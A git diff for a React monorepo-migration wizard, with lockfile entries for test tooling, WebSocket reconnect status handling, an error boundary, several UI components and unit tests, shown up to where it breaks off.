resolution: {integrity: sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==} hasBin: true @@ -638,11 +974,95 @@ packages: yaml: optional: true + vitest@4.0.18: + resolution: {integrity: sha512-hOQuK7h0FGKgBAas7v0mSAsnvrIgAvWmRFjmzpJ7SwFHH3g1k2u37JtYwOwmEKhK6ZO3v9ggDBBm0La1LCK4uQ==} + engines: {node: ^20.0.0 || ^22.0.0 || >=24.0.0} + hasBin: true + peerDependencies: + '@edge-runtime/vm': '*' + '@opentelemetry/api': ^1.9.0 + '@types/node': ^20.0.0 || ^22.0.0 || >=24.0.0 + '@vitest/browser-playwright': 4.0.18 + '@vitest/browser-preview': 4.0.18 + '@vitest/browser-webdriverio': 4.0.18 + '@vitest/ui': 4.0.18 + happy-dom: '*' + jsdom: '*' + peerDependenciesMeta: + '@edge-runtime/vm': + optional: true + '@opentelemetry/api': + optional: true + '@types/node': + optional: true + '@vitest/browser-playwright': + optional: true + '@vitest/browser-preview': + optional: true + '@vitest/browser-webdriverio': + optional: true + '@vitest/ui': + optional: true + happy-dom: + optional: true + jsdom: + optional: true + + w3c-xmlserializer@5.0.0: + resolution: {integrity: sha512-o8qghlI8NZHU1lLPrpi2+Uq7abh4GGPpYANlalzWxyWteJOCsr/P+oPBA49TOLu5FTZO4d3F9MnWJfiMo4BkmA==} + engines: {node: '>=18'} + + webidl-conversions@8.0.1: + resolution: {integrity: sha512-BMhLD/Sw+GbJC21C/UgyaZX41nPt8bUTg+jWyDeg7e7YN4xOM05YPSIXceACnXVtqyEw/LMClUQMtMZ+PGGpqQ==} + engines: {node: '>=20'} + + whatwg-mimetype@5.0.0: + resolution: {integrity: sha512-sXcNcHOC51uPGF0P/D4NVtrkjSU2fNsm9iog4ZvZJsL3rjoDAzXZhkm2MWt1y+PUdggKAYVoMAIYcs78wJ51Cw==} + engines: {node: '>=20'} + + whatwg-url@16.0.1: + resolution: {integrity: sha512-1to4zXBxmXHV3IiSSEInrreIlu02vUOvrhxJJH5vcxYTBDAx51cqZiKdyTxlecdKNSjj8EcxGBxNf6Vg+945gw==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + + why-is-node-running@2.3.0: + resolution: {integrity: sha512-hUrmaWBdVDcxvYqnyh09zunKzROWjbZTiNy8dBEjkS7ehEDQibXJ7XvlmtbwuTclUiIyN+CyXQD4Vmko8fNm8w==} + engines: {node: '>=8'} + hasBin: true + + xml-name-validator@5.0.0: + resolution: {integrity: sha512-EvGK8EJ3DhaHfbRlETOWAS5pO9MZITeauHKJyb8wyajUfQUenkIg2MvLDTZ4T/TgIcm3HU0TFBgWWboAZ30UHg==} + engines: {node: '>=18'} + + xmlchars@2.2.0: + resolution: {integrity: sha512-JZnDKK8B0RCDw84FNdDAIpZK+JuJw+s7Lz8nksI7SIuU3UXJJslUthsi+uWBUYOwPFwW7W7PRLRfUKpxjtjFCw==} + yallist@3.1.1: resolution: {integrity: sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==} snapshots: + '@acemir/cssom@0.9.31': {} + + '@adobe/css-tools@4.4.4': {} + + '@asamuzakjp/css-color@5.0.1': + dependencies: + '@csstools/css-calc': 3.1.1(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0) + '@csstools/css-color-parser': 4.0.2(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0) + '@csstools/css-parser-algorithms': 4.0.0(@csstools/css-tokenizer@4.0.0) + '@csstools/css-tokenizer': 4.0.0 + lru-cache: 11.2.6 + + '@asamuzakjp/dom-selector@6.8.1': + dependencies: + '@asamuzakjp/nwsapi': 2.3.9 + bidi-js: 1.0.3 + css-tree: 3.1.0 + is-potential-custom-element-name: 1.0.1 + lru-cache: 11.2.6 + + '@asamuzakjp/nwsapi@2.3.9': {} + '@babel/code-frame@7.29.0': dependencies: '@babel/helper-validator-identifier': 7.28.5 @@ -732,6 +1152,8 @@ snapshots: '@babel/core': 7.29.0 '@babel/helper-plugin-utils': 7.28.6 + '@babel/runtime@7.28.6': {} + '@babel/template@7.28.6': dependencies: '@babel/code-frame': 7.29.0 @@ -755,6 +1177,32 @@ snapshots: '@babel/helper-string-parser': 7.27.1 '@babel/helper-validator-identifier': 7.28.5 + '@bramus/specificity@2.4.2': + dependencies: + css-tree: 3.1.0 + + '@csstools/color-helpers@6.0.2': {} + + '@csstools/css-calc@3.1.1(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0)': + dependencies: + '@csstools/css-parser-algorithms': 4.0.0(@csstools/css-tokenizer@4.0.0) + '@csstools/css-tokenizer': 4.0.0 + + '@csstools/css-color-parser@4.0.2(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0)': + dependencies: + '@csstools/color-helpers': 6.0.2 + '@csstools/css-calc': 3.1.1(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0) + '@csstools/css-parser-algorithms': 4.0.0(@csstools/css-tokenizer@4.0.0) + '@csstools/css-tokenizer': 4.0.0 + + '@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0)': + dependencies: + '@csstools/css-tokenizer': 4.0.0 + + '@csstools/css-syntax-patches-for-csstree@1.0.29': {} + + '@csstools/css-tokenizer@4.0.0': {} + '@esbuild/aix-ppc64@0.25.12': optional: true @@ -833,6 +1281,8 @@ snapshots: '@esbuild/win32-x64@0.25.12': optional: true + '@exodus/bytes@1.14.1': {} + '@jridgewell/gen-mapping@0.3.13': dependencies: '@jridgewell/sourcemap-codec': 1.5.5 @@ -929,6 +1379,40 @@ snapshots: '@rollup/rollup-win32-x64-msvc@4.59.0': optional: true + '@standard-schema/spec@1.1.0': {} + + '@testing-library/dom@10.4.1': + dependencies: + '@babel/code-frame': 7.29.0 + '@babel/runtime': 7.28.6 + '@types/aria-query': 5.0.4 + aria-query: 5.3.0 + dom-accessibility-api: 0.5.16 + lz-string: 1.5.0 + picocolors: 1.1.1 + pretty-format: 27.5.1 + + '@testing-library/jest-dom@6.9.1': + dependencies: + '@adobe/css-tools': 4.4.4 + aria-query: 5.3.2 + css.escape: 1.5.1 + dom-accessibility-api: 0.6.3 + picocolors: 1.1.1 + redent: 3.0.0 + + '@testing-library/react@16.3.2(@testing-library/dom@10.4.1)(@types/react-dom@19.2.3(@types/react@19.2.14))(@types/react@19.2.14)(react-dom@19.2.4(react@19.2.4))(react@19.2.4)': + dependencies: + '@babel/runtime': 7.28.6 + '@testing-library/dom': 10.4.1 + react: 19.2.4 + react-dom: 19.2.4(react@19.2.4) + optionalDependencies: + '@types/react': 19.2.14 + '@types/react-dom': 19.2.3(@types/react@19.2.14) + + '@types/aria-query@5.0.4': {} + '@types/babel__core@7.20.5': dependencies: '@babel/parser': 7.29.0 @@ -950,6 +1434,13 @@ snapshots: dependencies: '@babel/types': 7.29.0 + '@types/chai@5.2.3': + dependencies: + '@types/deep-eql': 4.0.2 + assertion-error: 2.0.1 + + '@types/deep-eql@4.0.2': {} + '@types/estree@1.0.8': {} '@types/react-dom@19.2.3(@types/react@19.2.14)': @@ -972,8 +1463,65 @@ snapshots: transitivePeerDependencies: - supports-color + '@vitest/expect@4.0.18': + dependencies: + '@standard-schema/spec': 1.1.0 + '@types/chai': 5.2.3 + '@vitest/spy': 4.0.18 + '@vitest/utils': 4.0.18 + chai: 6.2.2 + tinyrainbow: 3.0.3 + + '@vitest/mocker@4.0.18(vite@6.4.1)': + dependencies: + '@vitest/spy': 4.0.18 + estree-walker: 3.0.3 + magic-string: 0.30.21 + optionalDependencies: + vite: 6.4.1 + + '@vitest/pretty-format@4.0.18': + dependencies: + tinyrainbow: 3.0.3 + + '@vitest/runner@4.0.18': + dependencies: + '@vitest/utils': 4.0.18 + pathe: 2.0.3 + + '@vitest/snapshot@4.0.18': + dependencies: + '@vitest/pretty-format': 4.0.18 + magic-string: 0.30.21 + pathe: 2.0.3 + + '@vitest/spy@4.0.18': {} + + '@vitest/utils@4.0.18': + dependencies: + '@vitest/pretty-format': 4.0.18 + tinyrainbow: 3.0.3 + + agent-base@7.1.4: {} + + ansi-regex@5.0.1: {} + + ansi-styles@5.2.0: {} + + aria-query@5.3.0: + dependencies: + dequal: 2.0.3 + + aria-query@5.3.2: {} + + assertion-error@2.0.1: {} + baseline-browser-mapping@2.10.0: {} + bidi-js@1.0.3: + dependencies: + require-from-string: 2.0.2 + browserslist@4.28.1: dependencies: baseline-browser-mapping: 2.10.0 @@ -984,16 +1532,51 @@ snapshots: caniuse-lite@1.0.30001774: {} + chai@6.2.2: {} + convert-source-map@2.0.0: {} + css-tree@3.1.0: + dependencies: + mdn-data: 2.12.2 + source-map-js: 1.2.1 + + css.escape@1.5.1: {} + + cssstyle@6.2.0: + dependencies: + '@asamuzakjp/css-color': 5.0.1 + '@csstools/css-syntax-patches-for-csstree': 1.0.29 + css-tree: 3.1.0 + lru-cache: 11.2.6 + csstype@3.2.3: {} + data-urls@7.0.0: + dependencies: + whatwg-mimetype: 5.0.0 + whatwg-url: 16.0.1 + transitivePeerDependencies: + - '@noble/hashes' + debug@4.4.3: dependencies: ms: 2.1.3 + decimal.js@10.6.0: {} + + dequal@2.0.3: {} + + dom-accessibility-api@0.5.16: {} + + dom-accessibility-api@0.6.3: {} + electron-to-chromium@1.5.302: {} + entities@6.0.1: {} + + es-module-lexer@1.7.0: {} + esbuild@0.25.12: optionalDependencies: '@esbuild/aix-ppc64': 0.25.12 @@ -1025,6 +1608,12 @@ snapshots: escalade@3.2.0: {} + estree-walker@3.0.3: + dependencies: + '@types/estree': 1.0.8 + + expect-type@1.3.0: {} + fdir@6.5.0(picomatch@4.0.3): optionalDependencies: picomatch: 4.0.3 @@ -1034,22 +1623,93 @@ snapshots: gensync@1.0.0-beta.2: {} + html-encoding-sniffer@6.0.0: + dependencies: + '@exodus/bytes': 1.14.1 + transitivePeerDependencies: + - '@noble/hashes' + + http-proxy-agent@7.0.2: + dependencies: + agent-base: 7.1.4 + debug: 4.4.3 + transitivePeerDependencies: + - supports-color + + https-proxy-agent@7.0.6: + dependencies: + agent-base: 7.1.4 + debug: 4.4.3 + transitivePeerDependencies: + - supports-color + + indent-string@4.0.0: {} + + is-potential-custom-element-name@1.0.1: {} + js-tokens@4.0.0: {} + jsdom@28.1.0: + dependencies: + '@acemir/cssom': 0.9.31 + '@asamuzakjp/dom-selector': 6.8.1 + '@bramus/specificity': 2.4.2 + '@exodus/bytes': 1.14.1 + cssstyle: 6.2.0 + data-urls: 7.0.0 + decimal.js: 10.6.0 + html-encoding-sniffer: 6.0.0 + http-proxy-agent: 7.0.2 + https-proxy-agent: 7.0.6 + is-potential-custom-element-name: 1.0.1 + parse5: 8.0.0 + saxes: 6.0.0 + symbol-tree: 3.2.4 + tough-cookie: 6.0.0 + undici: 7.22.0 + w3c-xmlserializer: 5.0.0 + webidl-conversions: 8.0.1 + whatwg-mimetype: 5.0.0 + whatwg-url: 16.0.1 + xml-name-validator: 5.0.0 + transitivePeerDependencies: + - '@noble/hashes' + - supports-color + jsesc@3.1.0: {} json5@2.2.3: {} + lru-cache@11.2.6: {} + lru-cache@5.1.1: dependencies: yallist: 3.1.1 + lz-string@1.5.0: {} + + magic-string@0.30.21: + dependencies: + '@jridgewell/sourcemap-codec': 1.5.5 + + mdn-data@2.12.2: {} + + min-indent@1.0.1: {} + ms@2.1.3: {} nanoid@3.3.11: {} node-releases@2.0.27: {} + obug@2.1.1: {} + + parse5@8.0.0: + dependencies: + entities: 6.0.1 + + pathe@2.0.3: {} + picocolors@1.1.1: {} picomatch@4.0.3: {} @@ -1060,15 +1720,32 @@ snapshots: picocolors: 1.1.1 source-map-js: 1.2.1 + pretty-format@27.5.1: + dependencies: + ansi-regex: 5.0.1 + ansi-styles: 5.2.0 + react-is: 17.0.2 + + punycode@2.3.1: {} + react-dom@19.2.4(react@19.2.4): dependencies: react: 19.2.4 scheduler: 0.27.0 + react-is@17.0.2: {} + react-refresh@0.17.0: {} react@19.2.4: {} + redent@3.0.0: + dependencies: + indent-string: 4.0.0 + strip-indent: 3.0.0 + + require-from-string@2.0.2: {} + rollup@4.59.0: dependencies: '@types/estree': 1.0.8 @@ -1100,19 +1777,57 @@ snapshots: '@rollup/rollup-win32-x64-msvc': 4.59.0 fsevents: 2.3.3 + saxes@6.0.0: + dependencies: + xmlchars: 2.2.0 + scheduler@0.27.0: {} semver@6.3.1: {} + siginfo@2.0.0: {} + source-map-js@1.2.1: {} + stackback@0.0.2: {} + + std-env@3.10.0: {} + + strip-indent@3.0.0: + dependencies: + min-indent: 1.0.1 + + symbol-tree@3.2.4: {} + + tinybench@2.9.0: {} + + tinyexec@1.0.2: {} + tinyglobby@0.2.15: dependencies: fdir: 6.5.0(picomatch@4.0.3) picomatch: 4.0.3 + tinyrainbow@3.0.3: {} + + tldts-core@7.0.24: {} + + tldts@7.0.24: + dependencies: + tldts-core: 7.0.24 + + tough-cookie@6.0.0: + dependencies: + tldts: 7.0.24 + + tr46@6.0.0: + dependencies: + punycode: 2.3.1 + typescript@5.9.3: {} + undici@7.22.0: {} + update-browserslist-db@1.2.3(browserslist@4.28.1): dependencies: browserslist: 4.28.1 @@ -1130,4 +1845,66 @@ snapshots: optionalDependencies: fsevents: 2.3.3 + vitest@4.0.18(jsdom@28.1.0): + dependencies: + '@vitest/expect': 4.0.18 + '@vitest/mocker': 4.0.18(vite@6.4.1) + '@vitest/pretty-format': 4.0.18 + '@vitest/runner': 4.0.18 + '@vitest/snapshot': 4.0.18 + '@vitest/spy': 4.0.18 + '@vitest/utils': 4.0.18 + es-module-lexer: 1.7.0 + expect-type: 1.3.0 + magic-string: 0.30.21 + obug: 2.1.1 + pathe: 2.0.3 + picomatch: 4.0.3 + std-env: 3.10.0 + tinybench: 2.9.0 + tinyexec: 1.0.2 + tinyglobby: 0.2.15 + tinyrainbow: 3.0.3 + vite: 6.4.1 + why-is-node-running: 2.3.0 + optionalDependencies: + jsdom: 28.1.0 + transitivePeerDependencies: + - jiti + - less + - lightningcss + - msw + - sass + - sass-embedded + - stylus + - sugarss + - terser + - tsx + - yaml + + w3c-xmlserializer@5.0.0: + dependencies: + xml-name-validator: 5.0.0 + + webidl-conversions@8.0.1: {} + + whatwg-mimetype@5.0.0: {} + + whatwg-url@16.0.1: + dependencies: + '@exodus/bytes': 1.14.1 + tr46: 6.0.0 + webidl-conversions: 8.0.1 + transitivePeerDependencies: + - '@noble/hashes' + + why-is-node-running@2.3.0: + dependencies: + siginfo: 2.0.0 + stackback: 0.0.2 + + xml-name-validator@5.0.0: {} + + xmlchars@2.2.0: {} + yallist@3.1.1: {} diff --git a/ui/src/App.css b/ui/src/App.css index 2b1f74b..a6c604c 100755 --- a/ui/src/App.css +++ b/ui/src/App.css @@ -69,11 +69,19 @@ body { background: var(--bg-surface); } -.ws-status[data-connected='true'] { +.ws-status[data-state='connected'] { color: var(--success); } -.ws-status[data-connected='false'] { +.ws-status[data-state='disconnected'] { + color: var(--error); +} + +.ws-status[data-state='reconnecting'] { + color: var(--warn); +} + +.ws-status[data-state='failed'] { color: var(--error); } @@ -448,6 +456,13 @@ button.danger { font-size: 0.85rem; } +.error-boundary { + border: 1px solid var(--error); + border-radius: 8px; + background: color-mix(in srgb, var(--error) 8%, var(--bg-card)); + padding: 1rem; +} + /* Radio group */ .radio-group { display: flex; diff --git a/ui/src/App.tsx b/ui/src/App.tsx index fe2c329..ab7d080 100755 --- a/ui/src/App.tsx +++ b/ui/src/App.tsx @@ -1,4 +1,3 @@ -import { useState } from 'react'; import { useWebSocket } from './hooks/useWebSocket'; import { useWizardState } from './hooks/useWizardState'; import { WizardStepper } from './components/WizardStepper'; @@ -11,6 +10,7 @@ import { MigrateBranchesPage } from './pages/MigrateBranchesPage'; import { VerifyPage } from './pages/VerifyPage'; import { ArchivePage } from './pages/ArchivePage'; import { OperatePage } from './pages/OperatePage'; +import { WizardErrorBoundary } from './components/ErrorBoundary'; const STEP_ORDER = [ 'assess', 'prepare', 'merge', 'configure', @@ -20,7 +20,20 @@ const STEP_ORDER = [ export function App() { const ws = useWebSocket(); const wizard = useWizardState(); - const [packageNames] = useState([]); + const wsState = ws.connected + ? 'connected' + : ws.connectionFailed + ? 'failed' + : ws.reconnecting + ? 'reconnecting' + : 'disconnected'; + const wsText = ws.connected + ? 'connected' + : ws.connectionFailed + ? 'connection failed' + : ws.reconnecting + ? `reconnecting (${ws.retryCount}/${ws.maxRetries})` + : 'disconnected'; // While loading, show minimal UI if (wizard.loading) { @@ -28,8 +41,16 @@ export function App() {

monotize

+ + {wsText} +
+ {ws.connectionFailed && ( +
+ Lost connection to the local server. Ensure `monorepo ui` is running, then refresh. +
+ )}

Loading...

@@ -42,11 +63,16 @@ export function App() {

monotize

- - {ws.connected ? 'connected' : 'disconnected'} + + {wsText}
+ {ws.connectionFailed && ( +
+ Lost connection to the local server. Ensure `monorepo ui` is running, then refresh. +
+ )}
@@ -55,6 +81,7 @@ export function App() { const { state } = wizard; const currentStep = state.currentStep; + const packageNames = state.options.packageNames ?? []; const handleStepClick = (stepId: string) => { wizard.goToStep(stepId); @@ -88,6 +115,11 @@ export function App() { await wizard.save(updated); }; + const handlePackageNamesChange = async (names: string[]) => { + const updated = { ...state, options: { ...state.options, packageNames: names } }; + await wizard.save(updated); + }; + const handleTargetNodeVersionChange = async (v: string) => { const updated = { ...state, options: { ...state.options, targetNodeVersion: v || undefined } }; await wizard.save(updated); @@ -122,6 +154,7 @@ export function App() { repos={state.repos} options={state.options} onPlanPathChange={handlePlanPathChange} + onPackageNamesChange={handlePackageNamesChange} onComplete={() => handleComplete('merge')} onSkip={handleSkip} /> @@ -177,17 +210,31 @@ export function App() {

monotize

- - {ws.connected ? 'connected' : 'disconnected'} + + {wsText}
+ {ws.connectionFailed && ( +
+ Lost connection to the local server. Ensure `monorepo ui` is running, then refresh. +
+ )}
- {renderCurrentPage()} + { + const idx = STEP_ORDER.indexOf(currentStep); + if (idx > 0) { + void wizard.goToStep(STEP_ORDER[idx - 1]); + } + }} + > + {renderCurrentPage()} +
); diff --git a/ui/src/api/client.ts b/ui/src/api/client.ts index 20bb63a..59ac357 100755 --- a/ui/src/api/client.ts +++ b/ui/src/api/client.ts @@ -64,6 +64,7 @@ export interface WizardGlobalOptions { workspaceTool: string; planPath?: string; targetNodeVersion?: string; + packageNames?: string[]; } export interface WizardState { diff --git a/ui/src/components/DiffViewer.tsx b/ui/src/components/DiffViewer.tsx new file mode 100755 index 0000000..db8d397 --- /dev/null +++ b/ui/src/components/DiffViewer.tsx @@ -0,0 +1,32 @@ +import React from 'react'; + +interface DiffViewerProps { + before?: string; + after: string; + path: string; +} + +export function DiffViewer({ before, after, path }: DiffViewerProps) { + const beforeLines = before ? before.split('\n') : []; + const afterLines = after.split('\n'); + + return ( +
+
+ {before ? `--- ${path}` : `+++ ${path} (new file)`} +
+
+        {before && beforeLines.map((line, i) => (
+          
+ - {line} +
+ ))} + {afterLines.map((line, i) => ( +
+ + {line} +
+ ))} +
+
+ ); +} diff --git a/ui/src/components/ErrorBoundary.tsx b/ui/src/components/ErrorBoundary.tsx new file mode 100644 index 0000000..d3f6a2c --- /dev/null +++ b/ui/src/components/ErrorBoundary.tsx @@ -0,0 +1,50 @@ +import { Component } from 'react'; +import type { ErrorInfo, ReactNode } from 'react'; + +interface WizardErrorBoundaryProps { + children: ReactNode; + onGoBack?: () => void; +} + +interface WizardErrorBoundaryState { + hasError: boolean; + error: Error | null; +} + +export class WizardErrorBoundary extends Component { + constructor(props: WizardErrorBoundaryProps) { + super(props); + this.state = { hasError: false, error: null }; + } + + static getDerivedStateFromError(error: Error): WizardErrorBoundaryState { + return { hasError: true, error }; + } + + componentDidCatch(error: Error, errorInfo: ErrorInfo): void { + console.error('WizardErrorBoundary caught an error:', error, errorInfo); + } + + handleGoBack = () => { + this.setState({ hasError: false, error: null }); + this.props.onGoBack?.(); + }; + + render() { + if (this.state.hasError) { + return ( +
+

Something went wrong

+
+ {this.state.error?.message || 'An unexpected error occurred'} +
+ +
+ ); + } + + return this.props.children; + } +} diff --git a/ui/src/components/FindingsFilter.tsx b/ui/src/components/FindingsFilter.tsx new file mode 100755 index 0000000..f50b311 --- /dev/null +++ b/ui/src/components/FindingsFilter.tsx @@ -0,0 +1,82 @@ +import React, { useState } from 'react'; +import { SeverityBadge } from './SeverityBadge'; + +interface Finding { + id: string; + title: string; + severity: 'info' | 'warn' | 'error' | 'critical'; + suggestedAction?: string; +} + +interface FindingsFilterProps { + findings: Finding[]; + onFilterChange?: (filtered: Finding[]) => void; +} + +export function FindingsFilter({ findings, onFilterChange }: FindingsFilterProps) { + const [activeSeverities, setActiveSeverities] = useState>( + new Set(['info', 'warn', 'error', 'critical']) + ); + + const toggle = (severity: string) => { + const next = new Set(activeSeverities); + if (next.has(severity)) { + next.delete(severity); + } else { + next.add(severity); + } + setActiveSeverities(next); + const filtered = findings.filter((f) => next.has(f.severity)); + onFilterChange?.(filtered); + }; + + const counts = { info: 0, warn: 0, error: 0, critical: 0 } as Record; + for (const f of findings) { + counts[f.severity] = (counts[f.severity] || 0) + 1; + } + + const filtered = findings.filter((f) => activeSeverities.has(f.severity)); + + return ( +
+
+ {(['critical', 'error', 'warn', 'info'] as const).map((sev) => ( + + ))} +
+
+ {filtered.map((f) => ( +
+
+ + {f.title} +
+ {f.suggestedAction && ( +
+ {f.suggestedAction} +
+ )} +
+ ))} + {filtered.length === 0 && ( +
+ No findings match the selected filters +
+ )} +
+
+ ); +} diff --git a/ui/src/components/LogStream.test.tsx b/ui/src/components/LogStream.test.tsx new file mode 100644 index 0000000..b210638 --- /dev/null +++ b/ui/src/components/LogStream.test.tsx @@ -0,0 +1,51 @@ +import { render, screen } from '@testing-library/react'; +import { LogStream } from './LogStream'; + +describe('LogStream', () => { + it('renders nothing when there are no logs', () => { + const { container } = render(); + expect(screen.queryByRole('log')).toBeNull(); + expect(container).toBeEmptyDOMElement(); + }); + + it('renders log entries with accessibility attributes', () => { + render( + + ); + + const logRegion = screen.getByRole('log'); + expect(logRegion).toHaveAttribute('aria-live', 'polite'); + expect(logRegion).toHaveAttribute('aria-relevant', 'additions text'); + expect(screen.getByText('started')).toBeInTheDocument(); + expect(screen.getByText('warning')).toBeInTheDocument(); + }); + + it('scrolls to the latest log on new entries', () => { + const { rerender } = render( + + ); + + const logRegion = screen.getByRole('log') as HTMLDivElement; + Object.defineProperty(logRegion, 'scrollHeight', { + configurable: true, + get: () => 360, + }); + logRegion.scrollTop = 0; + + rerender( + + ); + + expect(logRegion.scrollTop).toBe(360); + }); +}); diff --git a/ui/src/components/LogStream.tsx b/ui/src/components/LogStream.tsx index 4a02046..9c0d20a 100755 --- a/ui/src/components/LogStream.tsx +++ b/ui/src/components/LogStream.tsx @@ -21,7 +21,13 @@ export function LogStream({ logs }: LogStreamProps) { if (logs.length === 0) return null; return ( -
+
{logs.map((log, i) => (
{log.message} diff --git a/ui/src/components/SeverityBadge.tsx b/ui/src/components/SeverityBadge.tsx new file mode 100755 index 0000000..42118bc --- /dev/null +++ b/ui/src/components/SeverityBadge.tsx @@ -0,0 +1,30 @@ +import React from 'react'; + +interface SeverityBadgeProps { + severity: 'info' | 'warn' | 'error' | 'critical'; +} + +const COLORS: Record = { + info: { bg: '#e3f2fd', text: '#1565c0' }, + warn: { bg: '#fff3e0', text: '#e65100' }, + error: { bg: '#fce4ec', text: '#c62828' }, + critical: { bg: '#f3e5f5', text: '#6a1b9a' }, +}; + +export function SeverityBadge({ severity }: SeverityBadgeProps) { + const color = COLORS[severity] || COLORS.info; + return ( + + {severity} + + ); +} diff --git a/ui/src/components/TreePreview.tsx b/ui/src/components/TreePreview.tsx new file mode 100755 index 0000000..a9b38f4 --- /dev/null +++ b/ui/src/components/TreePreview.tsx @@ -0,0 +1,59 @@ +import React from 'react'; + +interface TreePreviewProps { + files: string[]; + title?: string; +} + +export function TreePreview({ files, title }: TreePreviewProps) { + // Build a tree structure from flat file paths + const tree = buildTree(files); + + return ( +
+ {title &&
{title}
} + {renderTree(tree, '')} +
+ ); +} + +interface TreeNode { + [key: string]: TreeNode | null; +} + +function buildTree(files: string[]): TreeNode { + const tree: TreeNode = {}; + for (const file of files.sort()) { + const parts = file.split('/'); + let current = tree; + for (let i = 0; i < parts.length; i++) { + const part = parts[i]; + if (i === parts.length - 1) { + current[part] = null; // leaf (file) + } else { + if (!current[part] || current[part] === null) { + current[part] = {}; + } + current = current[part] as TreeNode; + } + } + } + return tree; +} + +function renderTree(node: TreeNode, prefix: string): React.ReactNode { + const entries = Object.entries(node); + return entries.map(([name, child], i) => { + const isLast = i === entries.length - 1; + const connector = isLast ? '\u2514\u2500\u2500 ' : '\u251C\u2500\u2500 '; + const childPrefix = prefix + (isLast ? ' ' : '\u2502 '); + const isDir = child !== null; + + return ( + +
{prefix}{connector}{isDir ? `${name}/` : name}
+ {isDir && renderTree(child, childPrefix)} +
+ ); + }); +} diff --git a/ui/src/components/WizardStepper.test.tsx b/ui/src/components/WizardStepper.test.tsx new file mode 100644 index 0000000..66c6c66 --- /dev/null +++ b/ui/src/components/WizardStepper.test.tsx @@ -0,0 +1,36 @@ +import { fireEvent, render, screen } from '@testing-library/react'; +import { describe, expect, it, vi } from 'vitest'; +import { WizardStepper } from './WizardStepper'; + +const steps = [ + { id: 'assess', status: 'completed' as const }, + { id: 'prepare', status: 'in-progress' as const }, + { id: 'merge', status: 'pending' as const }, +]; + +describe('WizardStepper', () => { + it('renders step labels and status markers', () => { + render(); + + expect(screen.getByRole('button', { name: /Assess/i })).toBeInTheDocument(); + expect(screen.getByRole('button', { name: /Prepare/i })).toBeInTheDocument(); + expect(screen.getByRole('button', { name: /Merge/i })).toBeInTheDocument(); + expect(screen.getByText('ok')).toBeInTheDocument(); + expect(screen.getByText('...')).toBeInTheDocument(); + }); + + it('highlights the current step', () => { + render(); + + const current = screen.getByRole('button', { name: /Prepare/i }); + expect(current.className).toContain('active'); + }); + + it('calls onStepClick with the clicked step id', async () => { + const onStepClick = vi.fn(); + render(); + + fireEvent.click(screen.getByRole('button', { name: /Merge/i })); + expect(onStepClick).toHaveBeenCalledWith('merge'); + }); +}); diff --git a/ui/src/hooks/useOperation.test.tsx b/ui/src/hooks/useOperation.test.tsx new file mode 100644 index 0000000..0d0a883 --- /dev/null +++ b/ui/src/hooks/useOperation.test.tsx @@ -0,0 +1,104 @@ +import { act, renderHook, waitFor } from '@testing-library/react'; +import type { UseWebSocketReturn, WsEvent } from './useWebSocket'; +import { useOperation } from './useOperation'; + +type MockWebSocket = UseWebSocketReturn & { + subscribe: ReturnType; + cancel: ReturnType; + emit: (event: WsEvent) => void; +}; + +function createMockWebSocket(): MockWebSocket { + const handlers = new Set<(event: WsEvent) => void>(); + const subscribe = vi.fn(); + const cancel = vi.fn(); + + return { + connected: true, + reconnecting: false, + connectionFailed: false, + retryCount: 0, + maxRetries: 10, + subscribe, + cancel, + onEvent: (handler) => { + handlers.add(handler); + return () => { + handlers.delete(handler); + }; + }, + emit: (event) => { + for (const handler of handlers) { + handler(event); + } + }, + }; +} + +describe('useOperation', () => { + it('tracks operation lifecycle for the active operation id', async () => { + const ws = createMockWebSocket(); + const { result } = renderHook(() => useOperation(ws)); + + act(() => { + result.current.start('op-1'); + }); + + await waitFor(() => { + expect(result.current.opId).toBe('op-1'); + }); + + expect(ws.subscribe).toHaveBeenCalledWith('op-1'); + + act(() => { + ws.emit({ type: 'log', opId: 'other-op', message: 'ignore me' }); + ws.emit({ type: 'log', opId: 'op-1', level: 'warn', message: 'working' }); + ws.emit({ type: 'result', opId: 'op-1', data: { ok: true } }); + ws.emit({ type: 'error', opId: 'op-1', message: 'warning' }); + ws.emit({ type: 'done', opId: 'op-1' }); + }); + + expect(result.current.logs).toHaveLength(1); + expect(result.current.logs[0]).toEqual({ level: 'warn', message: 'working' }); + expect(result.current.result).toEqual({ ok: true }); + expect(result.current.error).toBe('warning'); + expect(result.current.isDone).toBe(true); + + act(() => { + result.current.cancel(); + }); + expect(ws.cancel).toHaveBeenCalledWith('op-1'); + + act(() => { + result.current.reset(); + }); + expect(result.current.opId).toBeNull(); + expect(result.current.logs).toEqual([]); + expect(result.current.result).toBeNull(); + expect(result.current.error).toBeNull(); + expect(result.current.isDone).toBe(false); + }); + + it('caps logs to the most recent 1000 entries', async () => { + const ws = createMockWebSocket(); + const { result } = renderHook(() => useOperation(ws)); + + act(() => { + result.current.start('op-logs'); + }); + + await waitFor(() => { + expect(result.current.opId).toBe('op-logs'); + }); + + act(() => { + for (let i = 0; i < 1005; i += 1) { + ws.emit({ type: 'log', opId: 'op-logs', message: `log-${i}` }); + } + }); + + expect(result.current.logs).toHaveLength(1000); + expect(result.current.logs[0]?.message).toBe('log-5'); + expect(result.current.logs[999]?.message).toBe('log-1004'); + }); +}); diff --git a/ui/src/hooks/useOperation.ts b/ui/src/hooks/useOperation.ts index 6df8acb..2954d13 100755 --- a/ui/src/hooks/useOperation.ts +++ b/ui/src/hooks/useOperation.ts @@ -13,6 +13,8 @@ interface OperationState { isDone: boolean; } +const MAX_LOGS = 1000; + export function useOperation(ws: UseWebSocketReturn) { const [opId, setOpId] = useState(null); const [state, setState] = useState({ @@ -34,11 +36,13 @@ export function useOperation(ws: 